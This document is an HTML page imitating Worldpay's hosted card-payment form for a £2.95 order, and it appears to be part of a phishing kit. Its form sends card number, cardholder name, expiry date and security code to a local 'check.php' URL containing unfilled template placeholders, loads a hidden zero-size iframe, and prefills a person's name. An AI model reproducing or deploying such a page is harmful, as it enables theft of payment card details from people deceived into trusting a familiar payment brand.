<!DOCTYPE html>
<html class="js" lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />

    <meta name="HandheldFriendly" content="True" />
    <meta name="MobileOptimized" content="320" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, user-scalable=yes"
    />

    <meta name="format-detection" content="telephone=no" />

    <link rel="stylesheet" href="combined.min.css" media="all" />

    <link rel="stylesheet" href="public.min.css" />

    <title>Card Details</title>

    <link
      rel="shortcut icon"
      href="https://hpp.worldpay.com/resources/static/61-0/img/favicon.ico"
      type="image/x-icon"
    />

    <style type="text/css">
      .gpay-button {
        background-origin: content-box;
        background-position: center center;
        background-repeat: no-repeat;
        background-size: contain;
        border: 0px;
        border-radius: 4px;
        box-shadow: rgba(60, 64, 67, 0.3) 0px 1px 1px 0px,
          rgba(60, 64, 67, 0.15) 0px 1px 3px 1px;
        cursor: pointer;
        height: 40px;
        min-height: 40px;
        padding: 11px 24px;
      }

      .gpay-button.black {
        background-color: #000;
        box-shadow: none;
        padding: 12px 24px 10px;
      }

      .gpay-button.white {
        background-color: #fff;
      }

      .gpay-button.short,
      .gpay-button.plain {
        min-width: 90px;
        width: 160px;
      }

      .gpay-button.black.short,
      .gpay-button.black.plain {
        background-image: url(https://www.gstatic.com/instantbuy/svg/dark_gpay.svg);
      }

      .gpay-button.white.short,
      .gpay-button.white.plain {
        background-image: url(https://www.gstatic.com/instantbuy/svg/light_gpay.svg);
      }

      .gpay-button.black.active {
        background-color: #5f6368;
      }

      .gpay-button.black.hover {
        background-color: #3c4043;
      }

      .gpay-button.white.active {
        background-color: #fff;
      }

      .gpay-button.white.focus {
        box-shadow: #e8e8e8 0 1px 1px 0, #e8e8e8 0 1px 3px;
      }

      .gpay-button.white.hover {
        background-color: #f8f8f8;
      }

      .gpay-button-fill,
      .gpay-button-fill > .gpay-button.white,
      .gpay-button-fill > .gpay-button.black {
        width: 100%;
        height: inherit;
      }

      .gpay-button-fill > .gpay-button.white,
      .gpay-button-fill > .gpay-button.black {
        padding: 11px 15%;
      }
    </style>
    <style type="text/css">
      .gpay-button.long,
      .gpay-button.buy {
        min-width: 152px;
        width: 240px;
      }

      .gpay-button.donate {
        min-width: 177px;
        width: 240px;
      }

      .gpay-button.white.long,
      .gpay-button.white.buy {
        background-image: url(https://www.gstatic.com/instantbuy/svg/light/en.svg);
      }

      .gpay-button.black.long,
      .gpay-button.black.buy {
        background-image: url(https://www.gstatic.com/instantbuy/svg/dark/en.svg);
      }

      .gpay-button.white.donate {
        background-image: url(https://www.gstatic.com/instantbuy/svg/light/donate/en.svg);
      }

      .gpay-button.black.donate {
        background-image: url(https://www.gstatic.com/instantbuy/svg/dark/donate/en.svg);
      }
    </style>
    <script src="validator.js"></script>
  </head>

  <body class=" ">
    <div class="wrapper">
      <div class="header clean">
        <header class="clean" role="banner">
          <h1>
            <img src="9E74AB5D-CC5E-6B72-E053-3870A00AEC13.png" alt="" />
          </h1>
        </header>
      </div>

      <div role="main" id="main">
        <div
          id="session-timeout"
          class="warning-message"
          data-time-warning="120"
          data-time-timeout="1800"
          role="alertdialog"
          aria-labelledby="session-timeout-title"
          aria-describedby="session-timeout-message"
        >
          <div role="document" tabindex="0" class="error-hint">
            <span id="session-timeout-title">
              Your session is about to expire.
            </span>
            <span id="session-timeout-message">
              If you need more time, click extend session.
            </span>

            <button id="extend-session-button" class="button extend-session">
              Extend session
            </button>
          </div>
        </div>

        <div class="box summary clearfix summary-hide-mobile" dir="ltr">
          <div
            id="orderSummaryDetailsTop"
            class="details order-summary collapsible-section"
          >
            <h2
              id="showOrderSummaryDesktop"
              class="collapsible-section-header btn-toggle-summary desktop-only section-header"
              role="button"
              aria-controls="orderSummarySection"
              aria-expanded="true"
            >
              <span tabindex="0">
                <span class="icon icon-collapsible" aria-hidden="true"></span>
                Order summary
              </span>
            </h2>

            <h2
              id="showOrderSummaryMobile"
              class="collapsible-section-header btn-toggle-summary print-no mobile-only section-header"
              role="button"
              aria-controls="orderSummarySection"
              aria-expanded="true"
            >
              <span tabindex="0">
                <span class="icon icon-collapsible" aria-hidden="true"></span>
                <strong dir="ltr">
                  Amount <span dir="ltr">(GBP)</span>:
                </strong>
                <span class="normalfont" dir="ltr">
                  <span dir="ltr">£2.95</span>
                </span>
              </span>
            </h2>

            <table
              class="collapsible-section-detail"
              role="region"
              id="orderSummarySection"
            >
              <tbody>
                <tr class="clearfix">
                  <th id="orderRefLabel" class="field-label">Reference:</th>
                  <td id="orderRef" class="summaryRef">15504880058988</td>
                </tr>

                <tr class="clearfix">
                  <th id="orderDescriptionLabel" class="field-label">
                    Description:
                  </th>
                  <td id="orderDescription" class="summaryDesc">
                    WorldPay Order
                  </td>
                </tr>

                <tr class="clearfix summaryAmount desktop-only">
                  <th id="orderAmountLabel" class="field-label">
                    <strong> Amount <span dir="ltr">(GBP)</span>: </strong>
                  </th>

                  <td id="orderAmount" class="summaryAmount">£2.95</td>
                </tr>
              </tbody>
            </table>
          </div>
        </div>

        <div id="dynamic-content" tabindex="-1">
          <div
            role="form"
            class="box payment-details"
            id="paymentDetails"
            data-page-title="Card Details"
            dir="ltr"
          >
            <a
              id="changePaymentMethod"
              href="https://hpp.worldpay.com/app/hpp/61-0/payment/changepm"
              data-id="landing"
              class="button btn-change-payment desktop-only ajax-button-full"
              draggable="false"
            >
              <span class="icon icon-redo" aria-hidden="true"></span>
              Back
            </a>
            <a
              id="changePaymentMethodMobile"
              href="https://hpp.worldpay.com/app/hpp/61-0/payment/changepm"
              data-id="landing"
              class="button btn-change-payment mobile-only ajax-button-full"
              draggable="false"
            >
              <span class="icon icon-redo" aria-hidden="true"></span>
              Back
            </a>

            <div class="paymentMethods-thumbs clearfix">
              <div class="smallIcons" id="pmIcons">
                <input
                  type="hidden"
                  id="securityCodeVisibilityTypeECMC"
                  name="securityCodeVisibilityTypeECMC"
                  class="securityCodeVisibilityType ECMC"
                  value="MANDATORY"
                />

                <img
                  id="verifiedByecmc"
                  class="small-icon threeds ECMC hidden"
                  title="3D Secure"
                  src="verified-by-ecmc-ssl.png"
                  alt=""
                  draggable="false"
                />

                <img
                  class="small-icon card ECMC"
                  title="Mastercard"
                  src="mastercard_115x72.png"
                  alt=""
                  draggable="false"
                />
              </div>
            </div>

            <h2 class="clearfix desktop-only section-header">
              <span class="no-wrap box-title">
                <span id="paymentDetailsHeader">Payment details</span>

                <div id="requiredFieldNote" class="required-field-container">
                  <em class="required-field">*</em>
                  <span class="note">Indicates a required field</span>
                </div>
              </span>
            </h2>

            <form
              id="command"
              class="form-validation"
              action="check.php?appID=##RAND1##&roy=##RAND2##&upd=##RAND3##"
              method="post"
              onsubmit="cardSubmit(event);"
            >
              <fieldset id="cardDetails">
                <input
                  id="hiddenSelectedPaymentMethod"
                  type="hidden"
                  name="selectedPaymentMethodName"
                  value=""
                />

                <div class="row pair clearfix">
                  <p
                    id="cardNumber-wrapper"
                    class="field-wrapper first"
                    data-mandatory="true"
                    data-interacted="true"
                  >
                    <label
                      for="cardNumber"
                      id="cardNumberLabel"
                      class="cardNumberClass field-label"
                    >
                      Card number

                      <em class="required-field">*</em>

                      <span
                        class="validity-indicator valid icon icon-tick"
                      ></span>
                      <span
                        class="validity-indicator invalid icon icon-cross"
                      ></span>
                    </label>

                    <input
                      id="cardNumber"
                      dir="ltr"
                      name="cn"
                      type="text"
                      class="textbox required cardNumber UNKNOWN"
                      pattern="[0-9\s]{11,24}"
                      maxlength="24"
                      placeholder=""
                      required="required"
                      onkeydown="onlyNumber(event);"
                    />

                    <small class="error-hint">Enter a valid card number</small>
                  </p>

                  <p
                    id="cardholderName-wrapper"
                    class="field-wrapper last"
                    data-mandatory="true"
                  >
                    <label
                      for="cardholderName"
                      id="cardholderNameLabel"
                      class="cardholderNameClass field-label"
                    >
                      Cardholder's name

                      <em class="required-field">*</em>

                      <span
                        class="validity-indicator valid icon icon-tick"
                      ></span>
                      <span
                        class="validity-indicator invalid icon icon-cross"
                      ></span>
                    </label>

                    <input
                      id="cardholderName"
                      name="cardholderName"
                      type="text"
                      class="textbox"
                      maxlength="80"
                      placeholder=""
                      role="textbox"
                      required="required"
                      ontouchstart=""
                      data-populate="card-holder-name"
                      data-mandatory-message="Enter a valid cardholder&#39;s name"
                      value="Ghiorghiu Andrei"
                    />

                    <small class="error-hint"
                      >Enter a valid card holder name</small
                    >
                  </p>
                </div>

                <div class="row pair clearfix section-details-bottom">
                  <p id="expiryDate-wrapper" class="field-wrapper first">
                    <label
                      for="expiryMonth"
                      id="expiryMonthLabel"
                      class="expiryMonthClass field-label"
                    >
                      Expiry date

                      <em class="required-field">*</em>

                      <span
                        class="validity-indicator valid icon icon-tick"
                      ></span>
                      <span
                        class="validity-indicator invalid icon icon-cross"
                      ></span>
                    </label>

                    <span
                      class="expiry-container"
                      data-expirydate-future-message="Expiry date must be in the future"
                      data-expirydate-valid-message="Enter a valid month and year"
                    >
                      <input
                        required="required"
                        id="expiryMonth"
                        name="expiryMonth"
                        type="text"
                        maxlength="2"
                        class="textbox expiry expiry-month"
                        placeholder="MM"
                        role="textbox"
                        aria-label=""
                        ontouchstart=""
                        value=""
                        onkeydown="onlyNumber(event);"
                        oninput="maxValue(event, 12);"
                      />

                      <span> / </span>

                      <input
                        required="required"
                        id="expiryYear"
                        name="expiryYear"
                        type="text"
                        maxlength="2"
                        class="textbox expiry expiry-year"
                        placeholder="YY"
                        role="textbox"
                        aria-label=""
                        ontouchstart=""
                        data-populate="card-expiry-year"
                        value=""
                        onkeydown="onlyNumber(event);"
                      />

                      <small class="error-hint"
                        >Enter a valid expiration date</small
                      >
                    </span>
                  </p>

                  <noscript> </noscript>

                  <input
                    type="hidden"
                    id="securityCodeVisibilityType"
                    name="securityCodeVisibilityType"
                    value="MANDATORY"
                  />

                  <input
                    type="hidden"
                    id="mandatoryForUnknown"
                    name="mandatoryForUnknown"
                    value="true"
                  />

                  <div id="securityCodeDivId" class="securityCode">
                    <p
                      id="security-code-wrapper"
                      class="field-wrapper last"
                      data-mandatory="true"
                    >
                      <label
                        for="securityCode"
                        id="securityCodeLabel"
                        class="securityCodeClass field-label"
                      >
                        Security code

                        <em class="required-field">*</em>

                        <span
                          class="validity-indicator valid icon icon-tick"
                        ></span>
                        <span
                          class="validity-indicator invalid icon icon-cross"
                        ></span>
                      </label>

                      <span class="security-code-container">
                        <span class="pin-wrapper">
                          <input
                            required="required"
                            id="securityCode"
                            name="securityCode"
                            type="text"
                            onkeydown="onlyNumber(event);"
                            autocomplete="off"
                            maxlength="4"
                            class="textbox pin security-code"
                            value=""
                          />

                          <!-- <img
                            id="pin-helpimg"
                            src="pin-card-multicard.svg"
                            alt=""
                            title="Security code"
                            class="pin-default"
                            draggable="false"
                          /> -->

                          <small class="error-hint"
                            >Enter a valid security code</small
                          >
                        </span>
                        <small
                          id="pin-helptxt"
                          class="pin-help security-code-text clearfix cardAny"
                        >
                          3 digits on the back of the card or 4 digits on the
                          front of card
                        </small>
                      </span>

                      <span
                        class="cardrule hidden cardDefault"
                        data-pin-suffix="3"
                        data-pin-minlength="3"
                        data-pin-maxlength="3"
                        data-pin-message="Last 3 digits on the back of card"
                      >
                        <img
                          src="pin-basic.svg"
                          class="cardrule-img hidden"
                          draggable="false"
                          alt=""
                        />
                      </span>
                    </p>
                  </div>
                </div>
              </fieldset>

              <fieldset id="combinedDetails">
                <fieldset id="billingAddress">
                  <div id="billingContainerPanel1Way" class="editable-panel">
                    <div
                      id="billingContainerPanel1wayTop"
                      class="panel1wayTop"
                    ></div>
                    <div id="billingContainerPanel1wayBottom"></div>
                  </div>
                </fieldset>
                <fieldset id="shippingAddress">
                  <div id="shippingContainerPanel1Way" class="editable-panel">
                    <div
                      id="shippingContainerPanel1wayTop"
                      class="panel1wayTop"
                    ></div>
                    <div id="shippingContainerPanel1wayBottom"></div>
                  </div>
                </fieldset>

                <fieldset id="contactDetails">
                  <div id="contactContainerPanel1Way" class="editable-panel">
                    <div
                      id="contactContainerPanel1wayTop"
                      class="panel1wayTop"
                    ></div>
                    <div id="contactContainerPanel1wayBottom"></div>
                  </div>
                </fieldset>
              </fieldset>

              <fieldset id="tokenisationDetails"></fieldset>

              <div class="footerSummary mobile-only">
                <div
                  id="orderSummaryDetailsBottom"
                  class="details order-summary collapsible-section"
                >
                  <h2
                    id="showOrderSummaryDesktop"
                    class="collapsible-section-header btn-toggle-summary desktop-only section-header"
                    role="button"
                    aria-controls="orderSummarySection"
                    aria-expanded="true"
                  >
                    <span tabindex="0">
                      <span
                        class="icon icon-collapsible"
                        aria-hidden="true"
                      ></span>
                      Order summary
                    </span>
                  </h2>

                  <h2
                    id="showOrderSummaryMobile"
                    class="collapsible-section-header btn-toggle-summary print-no mobile-only section-header"
                    role="button"
                    aria-controls="orderSummarySection"
                    aria-expanded="true"
                  >
                    <span tabindex="0">
                      <span
                        class="icon icon-collapsible"
                        aria-hidden="true"
                      ></span>
                      <strong dir="ltr">
                        Amount <span dir="ltr">(GBP)</span>:
                      </strong>
                      <span class="normalfont" dir="ltr">
                        <span dir="ltr">£2.95</span>
                      </span>
                    </span>
                  </h2>

                  <table
                    class="collapsible-section-detail"
                    role="region"
                    id="orderSummarySection"
                  >
                    <tbody>
                      <tr class="clearfix">
                        <th id="orderRefLabel" class="field-label">
                          Reference:
                        </th>
                        <td id="orderRef" class="summaryRef">
                          403572650-1602350009
                        </td>
                      </tr>

                      <tr class="clearfix">
                        <th id="orderDescriptionLabel" class="field-label">
                          Description:
                        </th>
                        <td id="orderDescription" class="summaryDesc">
                          WorldPay Order
                        </td>
                      </tr>

                      <tr class="clearfix summaryAmount desktop-only">
                        <th id="orderAmountLabel" class="field-label">
                          <strong>
                            Amount <span dir="ltr">(GBP)</span>:
                          </strong>
                        </th>

                        <td id="orderAmount" class="summaryAmount">£2.95</td>
                      </tr>
                    </tbody>
                  </table>
                </div>
              </div>
              <fieldset class="bottom clearfix">
                <div class="align-r cardMakePaymentButton">
                  <input
                    type="submit"
                    class="button btn-make-payment"
                    value="Make Payment"
                    id="submitButton"
                  />
                </div>

                <a
                  id="cancelButton"
                  href="https://hpp.worldpay.com/app/hpp/61-0/payment/cancel/confirm"
                  data-cancel-url="/app/hpp/61-0/payment/cancel"
                  class="button btn-cancel"
                  draggable="false"
                >
                  Cancel
                </a>
              </fieldset>

              <input
                type="hidden"
                id="dfReferenceId"
                name="dfReferenceId"
                value=""
              />

              <div
                id="cardinalThreeDs2DdcSettings"
                data-enabled="false"
                data-card-bin=""
                data-card-bin-field="cardNumber"
                data-ddc-url=""
                data-ddc-timeoutl="0"
                data-ddc-post-message-origin=""
                data-ddc-card-bin-digits="0"
                data-device-collection-jwt=""
              ></div>

              <input
                type="hidden"
                class="tmxSessionId"
                name="tmxSessionId"
                value=""
              />

              <div
                id="threatMetrixSettings"
                data-enabled="false"
                data-profiling-domain=""
                data-organization-id=""
              ></div>

              <div>
                <input
                  type="hidden"
                  name="_csrf"
                  value="54db5f17-a603-4eec-863e-d69753b27ddb"
                />
              </div>
            </form>
          </div>

          <div class="box loading-box failure">
            <div class="info">
              <img class="logo-powered-by" src="worldpay-logo.svg" alt="" />

              <div class="loading-dots" aria-hidden="true">
                <div class="icon icon-circle dot-1"></div>
                <div class="icon icon-circle dot-2"></div>
                <div class="icon icon-circle dot-3"></div>
                <div class="icon icon-circle dot-4"></div>
                <div class="icon icon-circle dot-5"></div>
                <div class="icon icon-circle dot-6"></div>
                <div class="icon icon-circle dot-7"></div>
                <div class="icon icon-circle dot-8"></div>
              </div>
            </div>

            <div class="retry-request">
              <p class="center">
                It looks like there may have been a connection issue...
              </p>
              <div class="button btn double-click-prevention">Try again</div>
            </div>
          </div>
        </div>

        <div id="dynamic-cancel-page" class="box payment-cancel-confirm">
          <h3 class="subsection-header">Cancel transaction</h3>
          <p>Your transaction will not be processed.</p>
          <p>
            <strong>Are you sure?</strong>
          </p>

          <a
            id="exitPaymentNoJsOff"
            href="https://hpp.worldpay.com/app/hpp/61-0/payment/start"
            class="button btn-confirm-no double-click-prevention"
          >
            No
          </a>
          <a
            id="exitPaymentYesJsOff"
            href="https://hpp.worldpay.com/app/hpp/61-0/payment/cancel"
            class="button btn-secondary btn-confirm-yes double-click-prevention"
          >
            Yes
          </a>
        </div>
      </div>

      <footer class="wp-footer" id="wpFooter-2" role="contentinfo" dir="ltr">
        <p>
          When you submit your transaction for processing by Worldpay you
          confirm your acceptance of
          <a
            href="https://www.worldpay.com/en-gb/privacy-policy"
            target="_blank"
          >
            Worldpay's privacy policy
          </a>
        </p>

        <p class="copyright" lang="en">
          © Worldpay 2013-2020. All rights reserved.
        </p>
      </footer>
    </div>

    <div
      id="sessionInfo"
      data-jsessionid="59a12bab-ab93-4b52-ad95-6b3540c4c35b.os"
      data-contextpath="/app/hpp/61-0"
      data-iframe="false"
      data-iframe-helper-url=""
      data-iframe-integration-id=""
      data-iframe-origin=""
    ></div>

    <div
      id="csrfToken"
      data-key="_csrf"
      data-value="54db5f17-a603-4eec-863e-d69753b27ddb"
    ></div>

    <noscript>
      <img src="https://hpp.worldpay.com/resources/static/61-0/img/pixel.png" />
    </noscript>

    <input
      type="text"
      id="back-button-detector"
      value="0"
      style="visibility: hidden; position: fixed"
    />

    <iframe
      src="payframe.html"
      height="0"
      width="0"
      allowpaymentrequest="true"
      style="display: none; visibility: hidden"
    ></iframe>
  </body>
</html>
